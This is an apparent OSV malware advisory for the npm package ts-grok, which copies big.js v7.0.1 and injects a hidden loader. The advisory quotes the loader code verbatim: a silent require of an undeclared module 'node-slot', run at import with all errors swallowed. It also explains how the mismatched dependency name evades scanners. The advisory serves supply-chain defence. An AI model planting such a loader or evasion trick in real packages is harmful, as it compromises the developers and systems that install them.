OSV ID
MAL-2026-6321
Ecosystem
npm
Summary
Package ts-grok ships a verbatim copy of big.js v7.0.1 (same banner, author 'Michael Mclaughlin', repository URL https://github.com/MikeMcl/big.js.git, and identical keywords) with a single foreign code block injected into both big.js and big.mjs: try { const doc = require("node-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { } . The require fires whenever a consumer imports the package, and all errors are swallowed so the call is invisible. The declared runtime dependency in package.json is 'block-slot' (^1.0.9), not 'node-slot' — the actual loaded module name does not match anything declared, so dependency-review tooling and SCA scanners auditing package.json will not see the real second-stage module. Whatever 'node-slot' resolves to in the installer's node_modules is executed silently at import time. The package has no legitimate relationship to big.js; the impersonation is the lure and the hidden loader is the payload.
Source: amazon-inspector (a981e7e3ba27d859a2c536cbc25c04ebece92e1992035226ea9246d8bd381f1d)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.